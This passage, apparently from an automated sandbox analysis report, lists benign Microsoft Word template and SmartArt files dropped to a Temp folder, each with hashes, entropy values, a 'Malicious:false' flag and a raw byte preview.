                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):5630
                                        Entropy (8bit):7.87271654296772
                                        Encrypted:false
                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                        Malicious:false
                                        Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                        C:\Users\user\AppData\Local\Temp\TCD8CC9.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):264
                                        Entropy (8bit):3.4866056878458096
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                        MD5:6C489D45F3B56845E68BE07EA804C698
                                        SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                        SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                        SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CC9.tmp\ThemePictureAccent.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6448
                                        Entropy (8bit):7.897260397307811
                                        Encrypted:false
                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                        MD5:42A840DC06727E42D42C352703EC72AA
                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                        Malicious:false
                                        Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                        C:\Users\user\AppData\Local\Temp\TCD8CCA.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5161159456784024
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CCA.tmp\turabian.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):344303
                                        Entropy (8bit):5.023195898304535
                                        Encrypted:false
                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                        C:\Users\user\AppData\Local\Temp\TCD8CCB.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):246
                                        Entropy (8bit):3.5039994158393686
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                        MD5:16711B951E1130126E240A6E4CC2E382
                                        SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                        SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                        SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CCB.tmp\TabbedArc.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):3683
                                        Entropy (8bit):7.772039166640107
                                        Encrypted:false
                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                        Malicious:false
                                        Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                        C:\Users\user\AppData\Local\Temp\TCD8CCC.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.538396048757031
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                        MD5:149948E41627BE5DC454558E12AF2DA4
                                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CCC.tmp\sist02.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250983
                                        Entropy (8bit):5.057714239438731
                                        Encrypted:false
                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Local\Temp\TCD8CCD.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.4680595384446202
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                        MD5:D79B5DE6D93AC06005761D88783B3EE6
                                        SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                        SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                        SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CCD.tmp\architecture.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5783
                                        Entropy (8bit):7.88616857639663
                                        Encrypted:false
                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                        Malicious:false
                                        Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                        C:\Users\user\AppData\Local\Temp\TCD8CE4.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):256
                                        Entropy (8bit):3.4842773155694724
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                        MD5:923D406B2170497AD4832F0AD3403168
                                        SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                        SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                        SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CE4.tmp\ConvergingText.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):11380
                                        Entropy (8bit):7.891971054886943
                                        Encrypted:false
                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                        C:\Users\user\AppData\Local\Temp\TCD8CE5.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):260
                                        Entropy (8bit):3.4895685222798054
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                        MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                        SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                        SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                        SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CE5.tmp\VaryingWidthList.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3075
                                        Entropy (8bit):7.716021191059687
                                        Encrypted:false
                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                        Malicious:false
                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                        C:\Users\user\AppData\Local\Temp\TCD8CF5.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):256
                                        Entropy (8bit):3.464918006641019
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                        MD5:93149E194021B37162FD86684ED22401
                                        SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                        SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                        SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8CF5.tmp\Equations.dotx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):51826
                                        Entropy (8bit):5.541375256745271
                                        Encrypted:false
                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                        Malicious:false
                                        Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                        C:\Users\user\AppData\Local\Temp\TCD8D17.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
